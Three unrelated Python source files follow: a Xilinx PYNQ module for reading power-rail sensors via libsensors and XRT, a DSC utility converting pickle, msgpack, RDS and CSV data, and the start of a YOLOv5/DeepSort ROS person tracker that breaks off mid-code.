pmbus.py
|
# Copyright (c) 2021, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cffi
import glob
import os
import threading
import time
import warnings
__author__ = "Peter Ogden"
__copyright__ = "Copyright 2021, Xilinx"
__email__ = "pynq_support@xilinx.com"
_c_header = R"""
extern const char *libsensors_version;
typedef struct sensors_bus_id {
short type;
short nr;
} sensors_bus_id;
typedef struct sensors_chip_name {
char *prefix;
sensors_bus_id bus;
int addr;
char *path;
} sensors_chip_name;
int sensors_init(FILE *input);
void sensors_cleanup(void);
int sensors_parse_chip_name(const char *orig_name, sensors_chip_name *res);
void sensors_free_chip_name(sensors_chip_name *chip);
int sensors_snprintf_chip_name(char *str, size_t size,
const sensors_chip_name *chip);
const char *sensors_get_adapter_name(const sensors_bus_id *bus);
typedef struct sensors_feature sensors_feature;
char *sensors_get_label(const sensors_chip_name *name,
const sensors_feature *feature);
int sensors_get_value(const sensors_chip_name *name, int subfeat_nr,
double *value);
int sensors_set_value(const sensors_chip_name *name, int subfeat_nr,
double value);
int sensors_do_chip_sets(const sensors_chip_name *name);
const sensors_chip_name *sensors_get_detected_chips(const sensors_chip_name
*match, int *nr);
typedef enum sensors_feature_type {
SENSORS_FEATURE_IN = 0x00,
SENSORS_FEATURE_FAN = 0x01,
SENSORS_FEATURE_TEMP = 0x02,
SENSORS_FEATURE_POWER = 0x03,
SENSORS_FEATURE_ENERGY = 0x04,
SENSORS_FEATURE_CURR = 0x05,
SENSORS_FEATURE_HUMIDITY = 0x06,
SENSORS_FEATURE_MAX_MAIN,
SENSORS_FEATURE_VID = 0x10,
SENSORS_FEATURE_INTRUSION = 0x11,
SENSORS_FEATURE_MAX_OTHER,
SENSORS_FEATURE_BEEP_ENABLE = 0x18,
SENSORS_FEATURE_MAX,
SENSORS_FEATURE_UNKNOWN = 0x7fffffff,
} sensors_feature_type;
typedef enum sensors_subfeature_type {
SENSORS_SUBFEATURE_IN_INPUT = 0,
SENSORS_SUBFEATURE_IN_MIN,
SENSORS_SUBFEATURE_IN_MAX,
SENSORS_SUBFEATURE_IN_LCRIT,
SENSORS_SUBFEATURE_IN_CRIT,
SENSORS_SUBFEATURE_IN_AVERAGE,
SENSORS_SUBFEATURE_IN_LOWEST,
SENSORS_SUBFEATURE_IN_HIGHEST,
SENSORS_SUBFEATURE_IN_ALARM = 0x80,
SENSORS_SUBFEATURE_IN_MIN_ALARM,
SENSORS_SUBFEATURE_IN_MAX_ALARM,
SENSORS_SUBFEATURE_IN_BEEP,
SENSORS_SUBFEATURE_IN_LCRIT_ALARM,
SENSORS_SUBFEATURE_IN_CRIT_ALARM,
SENSORS_SUBFEATURE_FAN_INPUT = 0x100,
SENSORS_SUBFEATURE_FAN_MIN,
SENSORS_SUBFEATURE_FAN_MAX,
SENSORS_SUBFEATURE_FAN_ALARM = 0x180,
SENSORS_SUBFEATURE_FAN_FAULT,
SENSORS_SUBFEATURE_FAN_DIV,
SENSORS_SUBFEATURE_FAN_BEEP,
SENSORS_SUBFEATURE_FAN_PULSES,
SENSORS_SUBFEATURE_FAN_MIN_ALARM,
SENSORS_SUBFEATURE_FAN_MAX_ALARM,
SENSORS_SUBFEATURE_TEMP_INPUT = 0x200,
SENSORS_SUBFEATURE_TEMP_MAX,
SENSORS_SUBFEATURE_TEMP_MAX_HYST,
SENSORS_SUBFEATURE_TEMP_MIN,
SENSORS_SUBFEATURE_TEMP_CRIT,
SENSORS_SUBFEATURE_TEMP_CRIT_HYST,
SENSORS_SUBFEATURE_TEMP_LCRIT,
SENSORS_SUBFEATURE_TEMP_EMERGENCY,
SENSORS_SUBFEATURE_TEMP_EMERGENCY_HYST,
SENSORS_SUBFEATURE_TEMP_LOWEST,
SENSORS_SUBFEATURE_TEMP_HIGHEST,
SENSORS_SUBFEATURE_TEMP_MIN_HYST,
SENSORS_SUBFEATURE_TEMP_LCRIT_HYST,
SENSORS_SUBFEATURE_TEMP_ALARM = 0x280,
SENSORS_SUBFEATURE_TEMP_MAX_ALARM,
SENSORS_SUBFEATURE_TEMP_MIN_ALARM,
SENSORS_SUBFEATURE_TEMP_CRIT_ALARM,
SENSORS_SUBFEATURE_TEMP_FAULT,
SENSORS_SUBFEATURE_TEMP_TYPE,
SENSORS_SUBFEATURE_TEMP_OFFSET,
SENSORS_SUBFEATURE_TEMP_BEEP,
SENSORS_SUBFEATURE_TEMP_EMERGENCY_ALARM,
SENSORS_SUBFEATURE_TEMP_LCRIT_ALARM,
SENSORS_SUBFEATURE_POWER_AVERAGE = 0x300,
SENSORS_SUBFEATURE_POWER_AVERAGE_HIGHEST,
SENSORS_SUBFEATURE_POWER_AVERAGE_LOWEST,
SENSORS_SUBFEATURE_POWER_INPUT,
SENSORS_SUBFEATURE_POWER_INPUT_HIGHEST,
SENSORS_SUBFEATURE_POWER_INPUT_LOWEST,
SENSORS_SUBFEATURE_POWER_CAP,
SENSORS_SUBFEATURE_POWER_CAP_HYST,
SENSORS_SUBFEATURE_POWER_MAX,
SENSORS_SUBFEATURE_POWER_CRIT,
SENSORS_SUBFEATURE_POWER_AVERAGE_INTERVAL = 0x380,
SENSORS_SUBFEATURE_POWER_ALARM,
SENSORS_SUBFEATURE_POWER_CAP_ALARM,
SENSORS_SUBFEATURE_POWER_MAX_ALARM,
SENSORS_SUBFEATURE_POWER_CRIT_ALARM,
SENSORS_SUBFEATURE_ENERGY_INPUT = 0x400,
SENSORS_SUBFEATURE_CURR_INPUT = 0x500,
SENSORS_SUBFEATURE_CURR_MIN,
SENSORS_SUBFEATURE_CURR_MAX,
SENSORS_SUBFEATURE_CURR_LCRIT,
SENSORS_SUBFEATURE_CURR_CRIT,
SENSORS_SUBFEATURE_CURR_AVERAGE,
SENSORS_SUBFEATURE_CURR_LOWEST,
SENSORS_SUBFEATURE_CURR_HIGHEST,
SENSORS_SUBFEATURE_CURR_ALARM = 0x580,
SENSORS_SUBFEATURE_CURR_MIN_ALARM,
SENSORS_SUBFEATURE_CURR_MAX_ALARM,
SENSORS_SUBFEATURE_CURR_BEEP,
SENSORS_SUBFEATURE_CURR_LCRIT_ALARM,
SENSORS_SUBFEATURE_CURR_CRIT_ALARM,
SENSORS_SUBFEATURE_HUMIDITY_INPUT = 0x600,
SENSORS_SUBFEATURE_VID = 0x1000,
SENSORS_SUBFEATURE_INTRUSION_ALARM = 0x1100,
SENSORS_SUBFEATURE_INTRUSION_BEEP,
SENSORS_SUBFEATURE_BEEP_ENABLE = 0x1800,
SENSORS_SUBFEATURE_UNKNOWN = 0x7fffffff,
} sensors_subfeature_type;
struct sensors_feature {
char *name;
int number;
sensors_feature_type type;
int first_subfeature;
int padding1;
};
typedef struct sensors_subfeature {
char *name;
int number;
sensors_subfeature_type type;
int mapping;
unsigned int flags;
} sensors_subfeature;
const sensors_feature *
sensors_get_features(const sensors_chip_name *name, int *nr);
const sensors_subfeature *
sensors_get_all_subfeatures(const sensors_chip_name *name,
const sensors_feature *feature, int *nr);
const sensors_subfeature *
sensors_get_subfeature(const sensors_chip_name *name,
const sensors_feature *feature,
sensors_subfeature_type type);
"""
_ffi = cffi.FFI()
try:
_ffi.cdef(_c_header)
_lib = _ffi.dlopen("libsensors.so")
except Exception as e:
_lib = None
class SysFSSensor:
def __init__(self, path, unit, name, scale):
self._path = path
self._unit = unit
self.name = name
self._scale = scale
self.parents = tuple()
@property
def value(self):
with open(self._path, "r") as f:
raw_value = float(f.read())
return raw_value * self._scale
def get_value(self, parents=None):
return self.value
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class DerivedPowerSensor:
def __init__(self, name, voltage, current):
parents = (voltage, current)
self.voltage_sensor = voltage
self.current_sensor = current
self.name = name
self.parents = (voltage, current)
def get_value(self, parents=None):
if parents is None:
return self.voltage_sensor.value * self.current_sensor.value
else:
return parents[0] * parents[1]
@property
def value(self):
return self.get_value()
def __repr__(self):
return "Sensor {{name={}, value={}W}}".format(
self.name, self.value)
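# Illustrative sketch (added comment, not part of the original source): when a
# rail exposes voltage and current but no power sensor, a DerivedPowerSensor
# multiplies the two readings. The rail name below is hypothetical:
#   rail = get_rails().get("some_rail")
#   if rail and rail.voltage and rail.current and not rail.power:
#       power = DerivedPowerSensor(rail.name + "_power", rail.voltage, rail.current)
#       print(power.value)  # volts * amperes -> watts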
class Sensor:
"""Interacts with a sensor exposed by libsensors
The value of the sensor is determined by the unit of the
underlying sensor API - that is generally Volts for potential
difference, Amperes for current, Watts for power and degrees
Centigrade for temperature
Attributes
----------
name : str
The name of the sensor
value : float
The current value of the sensor
"""
def __init__(self, chip, number, unit, name):
"""Create a new sensor object wrapping a libsensors chip and feature
Parameters
----------
chip : FFI sensors_chip_name*
The chip the sensor is on
number : int
The number of sensor on the chip
unit : str
Unit to append to the value when creating a string representation
name : str
Name of the sensor
"""
self._chip = chip
self._number = number
self._value = _ffi.new("double [1]")
self._unit = unit
self.name = name
self.parents = tuple()
@property
def value(self):
"""Read the current value of the sensor
"""
if _lib:
_lib.sensors_get_value(self._chip, self._number, self._value)
return self._value[0]
else:
return 0
def get_value(self, parents=None):
return self.value
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class Rail:
"""Bundles up to three sensors monitoring the same power rail
Represents a power rail in the system monitored by up to three
sensors for voltage, current and power.
Attributes
----------
name : str
Name of the power rail
voltage : Sensor or None
Voltage sensor for the rail or None if not available
current : Sensor or None
Current sensor for the rail or None if not available
power : Sensor or None
Power sensor for the rail or None if not available
"""
def __init__(self, name):
"""Create a new Rail with the specified rail
"""
self.name = name
self.voltage = None
self.current = None
self.power = None
def __repr__(self):
args = ["name=" + self.name]
if self.voltage:
args.append("voltage=" + repr(self.voltage))
if self.current:
args.append("current=" + repr(self.current))
if self.power:
args.append("power=" + repr(self.power))
return "Rail {{{}}}".format(', '.join(args))
class XrtInfoDump:
def __init__(self, device):
self._device = device
self.parents = tuple()
def get_value(self, parents=None):
info = self._device.device_info
return {
"0v85_v": info.m0v85,
"12v_aux_v": info.m12VAux,
"12v_aux_i": info.mAuxCurr,
"12v_pex_v": info.m12VPex,
"12v_pex_i": info.mPexCurr,
"12v_sw_v": info.m12vSW,
"1v8_v": info.m1v8Top,
"3v3_aux_v": info.m3v3Aux,
"3v3_pex_v": info.m3v3Pex,
"mgt0v9avcc_v": info.mMgt0v9,
"mgtavtt_v": info.mMgtVtt,
"sys_5v5_v": info.mSys5v5,
"vccint_v": info.mVccIntVol,
"vccint_i": info.mCurrent
}
class XrtSensor:
def __init__(self, unit, name, scale, parent, field):
self.parents = (parent,)
self._unit = unit
self.name = name
self._scale = scale
self._field = field
def get_value(self, parents=None):
if parents is None:
parents = (self.parents[0].get_value(),)
return parents[0][self._field] * self._scale
@property
def value(self):
return self.get_value()
def __repr__(self):
return "Sensor {{name={}, value={}{}}}".format(
self.name, self.value, self._unit)
class XrtRail:
def __init__(self, name, sample_dict, parent):
self.name = name
if name + "_v" in sample_dict:
self.voltage = XrtSensor("V", name + "_vol", 0.001, parent, name + "_v")
else:
self.voltage = None
if name + "_i" in sample_dict:
self.current = XrtSensor("A", name + "_curr", 0.001, parent, name + "_i")
else:
self.current = None
if self.voltage and self.current:
self.power = DerivedPowerSensor(name + "_power",
self.voltage, self.current)
else:
self.power = None
def __repr__(self):
args = ["name=" + self.name]
if self.voltage:
args.append("voltage=" + repr(self.voltage))
if self.current:
args.append("current=" + repr(self.current))
if self.power:
args.append("power=" + repr(self.power))
return "XrtRail {{{}}}".format(', '.join(args))
def get_xrt_sysfs_rails(device=None):
if device is None:
from pynq.pl_server import Device
device = Device.active_device
rail_names = ["0v85", "12v_aux", "12v_pex", "12v_sw", "1v8", "3v3_aux",
"3v3_pex", "mgt0v9avcc", "mgtavtt", "sys_5v5", "vccint" ]
infodump = XrtInfoDump(device)
sample_dict = infodump.get_value()
rails = {}
for n in rail_names:
rails[n] = XrtRail(n, sample_dict, infodump)
return rails
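# Usage sketch (not part of the original module): enumerate the XRT sysfs rails of the
# active device and print the derived VCCINT power; assumes an XRT-managed device is
# present, a 'vccint' rail is reported, and DerivedPowerSensor exposes .value like the
# other sensors.
def _print_vccint_power():
    rails = get_xrt_sysfs_rails()
    vccint = rails.get('vccint')
    if vccint is not None and vccint.power is not None:
        print('{:.3f} W'.format(vccint.power.value))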
def _enumerate_sensors(config_file=None):
if _lib is None:
warnings.warn("Could not initialise libsensors library")
return {}
if config_file:
with open(config_file, 'r') as handle:
            _lib.sensors_init(handle)
else:
_lib.sensors_init(_ffi.NULL)
chip_nr = _ffi.new("int [1]")
feature_nr = _ffi.new("int [1]")
rails = {}
chip_nr[0] = 0
cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
while cn:
feature_nr[0] = 0
feature = _lib.sensors_get_features(cn, feature_nr)
while feature:
name = _ffi.string(_lib.sensors_get_label(cn, feature)).decode()
subfeature = None
if feature.type == _lib.SENSORS_FEATURE_POWER:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_POWER_INPUT)
feature_type = "power"
unit = "W"
elif feature.type == _lib.SENSORS_FEATURE_IN:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_IN_INPUT)
feature_type = "voltage"
unit = "V"
elif feature.type == _lib.SENSORS_FEATURE_CURR:
subfeature = _lib.sensors_get_subfeature(
cn, feature, _lib.SENSORS_SUBFEATURE_CURR_INPUT)
feature_type = "current"
unit = "A"
if subfeature:
if name not in rails:
rails[name] = Rail(name)
setattr(rails[name], feature_type,
Sensor(cn, subfeature.number, unit, "{}_{}".format(
name, feature_type)))
feature = _lib.sensors_get_features(cn, feature_nr)
cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr)
return rails
def get_rails(config_file=None):
"""Returns a dictionary of power rails
Parameters
----------
config_file : str
Path to a configuration file for libsensors to use
        in place of the system-wide default
Returns
-------
dict {str : Rail}
Dictionary of power rails with the name of the rail as
the key and a Rail object as the value
"""
return _enumerate_sensors(config_file)
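# Usage sketch (not part of the original module): list every rail reported by libsensors
# together with whichever of its voltage/current/power sensors are available; assumes
# libsensors can be initialised on the running system.
def _print_rail_summary(config_file=None):
    for name, rail in get_rails(config_file).items():
        voltage = rail.voltage.value if rail.voltage else None
        current = rail.current.value if rail.current else None
        power = rail.power.value if rail.power else None
        print(name, voltage, current, power)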
class MultiSensor:
"""Class for efficiently collecting the readings from multiple sensors
"""
def __init__(self, sensors):
self._sensors = sensors
def get_values(self):
stored = {}
return tuple((self._get_value(s, stored) for s in self._sensors))
def _get_value(self, sensor, stored):
if sensor in stored:
return stored[sensor]
value = sensor.get_value([self._get_value(p, stored) for p in sensor.parents])
stored[sensor] = value
return value
class DataRecorder:
"""Class to record sensors during an execution
The DataRecorder provides a way of recording sensor data using a
`with` block.
"""
def __init__(self, *sensors):
"""Create a new DataRecorder attached to the specified sensors
"""
import pandas as pd
self._record_index = -1
self._sensors = sensors
self._getter = MultiSensor(sensors)
self._columns = ['Mark']
self._times = []
self._columns.extend([s.name for s in sensors])
self._frame = pd.DataFrame(columns=self._columns,
index = pd.DatetimeIndex([]),
dtype='f4')
self._callbacks = []
self._data = []
self._thread = None
def __del__(self):
if self._thread:
self.stop()
def reset(self):
"""Clear the internal state of the data recorder without
forgetting which sensors to record
"""
self._frame.drop(self._frame.index, inplace=True)
self._record_index = -1
def record(self, interval):
"""Start recording
"""
if self._thread:
raise RuntimeError("DataRecorder is already recording")
self._thread = threading.Thread(
target=DataRecorder._thread_func, args=[self])
self._interval = interval
self._done = False
self._record_index += 1
self._thread.start()
return self
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
return
def stop(self):
"""Stops recording
"""
self._done = True
self._thread.join()
self._thread = None
def mark(self):
"""Increment the Invocation count
"""
self._record_index += 1
return self._record_index
def _thread_func(self):
import pandas as pd
while not self._done:
row = [self._record_index]
row.extend(self._getter.get_values())
self._frame.loc[pd.Timestamp.now()] = row
time.sleep(self._interval)
@property
def frame(self):
"""Return a pandas DataFrame of the recorded data
The frame consists of the following fields
Index : The timestamp of the measurement
Mark : counts the number of times that record or mark was called
Sensors* : one column per sensor
"""
return self._frame
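# Usage sketch (not part of the original module): record the power sensors of all
# detected rails around a user-supplied callable; 'workload' is a hypothetical function
# standing in for the code being measured.
def _record_example(workload, interval=0.5):
    sensors = [r.power for r in get_rails().values() if r.power]
    recorder = DataRecorder(*sensors)
    with recorder.record(interval):
        workload()
    # DataFrame indexed by timestamp, one column per sensor plus 'Mark'
    return recorder.frame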
|
dsc_io.py
|
#!/usr/bin/env python
__author__ = "Gao Wang"
__copyright__ = "Copyright 2016, Stephens lab"
__email__ = "gaow@uchicago.edu"
__license__ = "MIT"
'''
Test rpy2 installation:
python -m 'rpy2.tests'
'''
from dsc.utils import flatten_list
def load_mpk(mpk_files, jobs=2):
import msgpack, collections
from multiprocessing import Process, Manager
from .utils import chunks
if isinstance(mpk_files, str):
return msgpack.unpackb(open(mpk_files, "rb").read(),
raw=False,
object_pairs_hook=collections.OrderedDict)
d = Manager().dict()
def f(d, x):
for xx in x:
d.update(
msgpack.unpackb(open(xx, "rb").read(),
raw=False,
object_pairs_hook=collections.OrderedDict))
#
mpk_files = [x for x in chunks(mpk_files, int(len(mpk_files) / jobs) + 1)]
job_pool = [Process(target=f, args=(d, x)) for x in mpk_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return collections.OrderedDict([
(x, d[x]) for x in sorted(d.keys(), key=lambda x: int(x.split(':')[0]))
])
def load_rds(filename, types=None):
import os
import pandas as pd, numpy as np
import rpy2.robjects as RO
import rpy2.robjects.vectors as RV
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
def load(data, types, rpy2_version=3):
if types is not None and not isinstance(data, types):
return np.array([])
# FIXME: I'm not sure if I should keep two versions here
# rpy2_version 2.9.X is more tedious but it handles BoolVector better
# rpy2 version 3.0.1 converts bool to integer directly without dealing with
# NA properly. It gives something like (0,1,-234235).
# Possibly the best thing to do is to open an issue for it to the developers.
if rpy2_version == 2:
# below works for rpy2 version 2.9.X
if isinstance(data, RI.RNULLType):
res = None
elif isinstance(data, RV.BoolVector):
data = RO.r['as.integer'](data)
res = np.array(data, dtype=int)
# Handle c(NA, NA) situation
if np.sum(np.logical_and(res != 0, res != 1)):
res = res.astype(float)
res[res < 0] = np.nan
res[res > 1] = np.nan
elif isinstance(data, RV.FactorVector):
data = RO.r['as.character'](data)
res = np.array(data, dtype=str)
elif isinstance(data, RV.IntVector):
res = np.array(data, dtype=int)
elif isinstance(data, RV.FloatVector):
res = np.array(data, dtype=float)
elif isinstance(data, RV.StrVector):
res = np.array(data, dtype=str)
elif isinstance(data, RV.DataFrame):
res = pd.DataFrame(data)
elif isinstance(data, RV.Matrix):
res = np.matrix(data)
elif isinstance(data, RV.Array):
res = np.array(data)
else:
# I do not know what to do for this
# But I do not want to throw an error either
res = str(data)
else:
if isinstance(data, RI.NULLType):
res = None
else:
res = data
if isinstance(res, np.ndarray) and res.shape == (1, ):
res = res[0]
return res
def load_dict(res, data, types):
'''load data to res'''
names = data.names if not isinstance(data.names, RI.NULLType) else [
i + 1 for i in range(len(data))
]
for name, value in zip(names, list(data)):
if isinstance(value, RV.ListVector):
res[name] = {}
res[name] = load_dict(res[name], value, types)
else:
res[name] = load(value, types)
return res
#
if not os.path.isfile(filename):
raise IOError('Cannot find file ``{}``!'.format(filename))
rds = RO.r['readRDS'](filename)
if isinstance(rds, RV.ListVector):
res = load_dict({}, rds, types)
else:
res = load(rds, types)
return res
def save_rds(data, filename):
    import collections.abc, re
import pandas as pd
import numpy as np
import rpy2.robjects as RO
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
# Supported data types:
# int, float, str, tuple, list, numpy array
# numpy matrix and pandas dataframe
int_type = (int, np.int8, np.int16, np.int32, np.int64)
    float_type = (float, np.floating)
def assign(name, value):
name = re.sub(r'[^\w' + '_.' + ']', '_', name)
if isinstance(value, (tuple, list)):
if all(isinstance(item, int_type) for item in value):
value = np.asarray(value, dtype=int)
elif all(isinstance(item, float_type) for item in value):
value = np.asarray(value, dtype=float)
else:
value = np.asarray(value)
if isinstance(value, np.matrix):
value = np.asarray(value)
if isinstance(
value,
tuple(flatten_list((str, float_type, int_type, np.ndarray)))):
if isinstance(value, np.ndarray) and value.dtype.kind == "u":
value = value.astype(int)
RO.r.assign(name, value)
elif isinstance(value, pd.DataFrame):
# FIXME: does not always work well for pd.DataFrame
RO.r.assign(name, value)
elif value is None:
RO.r.assign(name, RI.NULL)
else:
raise ValueError(
"Saving ``{}`` to RDS file is not supported!".format(
str(type(value))))
#
def assign_dict(name, value):
RO.r('%s <- list()' % name)
for k, v in value.items():
k = re.sub(r'[^\w' + '_.' + ']', '_', str(k))
if k.isdigit():
k = str(k)
            if isinstance(v, collections.abc.Mapping):
assign_dict('%s$%s' % (name, k), v)
else:
assign('item', v)
RO.r('%s$%s <- item' % (name, k))
#
    if isinstance(data, collections.abc.Mapping):
assign_dict('res', data)
else:
assign('res', data)
RO.r("saveRDS(res, '%s')" % filename)
def load_dsc(infiles):
import pickle, yaml
if isinstance(infiles, str):
infiles = [infiles]
res = dict()
for infile in infiles:
if infile.endswith('.pkl'):
data = pickle.load(open(infile, 'rb'))
elif infile.endswith('.rds'):
data = load_rds(infile)
elif infile.endswith('.yml'):
data = yaml.safe_load(open(infile).read())
else:
            raise ValueError(f'``{infile}`` is not a supported DSC data format')
try:
res.update(data)
except Exception:
# loaded a non-recursive object
return data
return res
def convert_dsc(pkl_files, jobs=2):
import pickle
from multiprocessing import Process
from .utils import chunks
def convert(d):
for ff in d:
if not ff.endswith('pkl'):
                raise ValueError(f'``{ff}`` is not a supported DSC data format')
save_rds(pickle.load(open(ff, 'rb')), ff[:-4] + '.rds')
#
if isinstance(pkl_files, str):
convert([pkl_files])
return 0
#
pkl_files = [x for x in chunks(pkl_files, int(len(pkl_files) / jobs) + 1)]
job_pool = [Process(target=convert, args=(x, )) for x in pkl_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return 0
def symlink_force(target, link_name):
import os, errno
try:
os.symlink(target, link_name)
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(link_name)
os.symlink(target, link_name)
else:
raise e
def csv_to_html(infile, outfile):
import os
import pandas as pd
pd.set_option('display.max_colwidth', -1)
from dsc.constant import TABLE_HEADER
def pop_html_img(x):
if not isinstance(x, str):
return x
if not (x.endswith('.png') or x.endswith('.jpg')):
return x
base, name = os.path.split(x)
if os.path.isfile(name):
full_path = False
elif os.path.isfile(x):
full_path = True
else:
return x
content = f'''<a href="{x if full_path else name}" onmouseover="showPopup(this, '{x if full_path else name}')" onmouseout="hidePopup()">{name if len(name) < 15 else "Image"}</a> <div id="popup"> </div></td>'''
return content
data = pd.read_csv(infile).applymap(pop_html_img)
with open(outfile, 'w') as f:
f.write(TABLE_HEADER + data.to_html(justify='center', escape=False))
def source_dirs(dirs):
import sys, os, glob
reserved = ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__']
functions = list()
for item in dirs:
item = os.path.abspath(os.path.expanduser(item))
sys.path.append(item)
for module in glob.glob(f'{item}/*.py'):
m = __import__(os.path.basename(module)[:-3])
for i in dir(m):
                if i not in reserved:
functions.append((i, getattr(m,i)))
return functions
def load_io_db(fn, sequence_id=None, module=None):
import pickle
data = pickle.load(open(fn, 'rb'))
return data[sequence_id][module] if sequence_id and module else data
def main():
import os, sys, pickle
if len(sys.argv) < 3:
sys.exit(0)
# Input is pkl, output is rds
infile = sys.argv[1]
outfile = sys.argv[2]
if '-f' in sys.argv:
try:
os.remove(outfile)
except Exception:
pass
if not os.path.isfile(outfile):
if infile.endswith('.pkl') and outfile.endswith('.rds'):
save_rds(pickle.load(open(infile, 'rb')), outfile)
elif infile.endswith('.rds') and outfile.endswith('.pkl'):
pickle.dump(load_rds(infile), open(outfile, 'wb'))
elif infile.endswith('.csv') and outfile.endswith('.html'):
csv_to_html(infile, outfile)
else:
sys.exit(1)
return 0
if __name__ == '__main__':
import warnings
from rpy2.rinterface import RRuntimeWarning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RRuntimeWarning)
main()
|
watchout_1.0.py
|
import sys
sys.path.insert(0, './yolov5')
from yolov5.utils.datasets import LoadImages, LoadStreams,LoadWebcam,LoadRealsense
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords
from yolov5.utils.torch_utils import select_device, time_synchronized
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import argparse
import os
import platform
import shutil
import time
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from visualization_msgs.msg import Marker,MarkerArray
import rospy
from geometry_msgs.msg import Point
from numba import jit
'''
This file is a modified version of the original track.py, with the following additions:
- depth computation
- marker (Marker/MarkerArray) visualisation
version: 1.0
'''
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def bbox_rel(*xyxy):
"""" Calculates the relative bounding box from absolute pixel values. """
bbox_left = min([xyxy[0].item(), xyxy[2].item()])
bbox_top = min([xyxy[1].item(), xyxy[3].item()])
bbox_w = abs(xyxy[0].item() - xyxy[2].item())
bbox_h = abs(xyxy[1].item() - xyxy[3].item())
x_c = (bbox_left + bbox_w / 2)
y_c = (bbox_top + bbox_h / 2)
w = bbox_w
h = bbox_h
return x_c, y_c, w, h
def compute_color_for_labels(label):
"""
Simple function that adds fixed color depending on the class
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def showdepth(boxes,depth):
for box in boxes:
x1,y1,x2,y2 = [int(i) for i in box]
for u in range(x1,x2):
for v in range(y1,y2):
print(depth[v,u]*0.001)
# Note: offset is the optical-centre offset applied to the box coordinates
def draw_boxes(img, bbox, identities=None, offset=(0, 0)):
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
#import math
#x1 = x1 + math.ceil((x2-x1)*0.382)
#x2 = x1 + math.ceil((x2-x1)*0.618)
#y1 = y1 + math.ceil((y2-y1)*0.382)
#y2 = y1 + math.ceil((y2-y1)*0.618)
# print(img.shape)
# print(x1,y1,x2,y2)
# # box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
cv2.rectangle(
img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
cv2.putText(img, label, (x1, y1 +
t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
return img
class Watchout:
def __init__(self):
self.lasttime = rospy.Time.now()
self.thistime = rospy.Time.now()
self.scale = 0.001
self.idcenvel = [] #id cx,cy,vx,vy
        self.depth_thres = 10.0  # depth threshold (metres)
        # Camera intrinsics
fx = 609.2713012695312
cx = 316.67022705078125
fy = 608.010498046875
cy = 244.8178253173828
self.K = np.array([[1.0/fx,0,-cx/fx],
[0,1.0/fy,-cy/fy],
[0.0 , 0.0, 1.0]])
self.lines = [[0,1],[1,3],[3,2],[2,0],
[0,4],[2,6],[1,5],[3,7],
[4,5],[5,7],[7,6],[6,4]]
self.pub = rospy.Publisher('Personbox',MarkerArray,queue_size=1)
self.rate = rospy.Rate(10)
def watch(self,opt, save_img=False):
out, source,weights, view_img, save_txt, imgsz = \
opt.output, opt.source ,opt.weights, opt.view_img, opt.save_txt, opt.img_size
# initialize deepsort
cfg = get_config()
cfg.merge_from_file(opt.config_deepsort)
deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
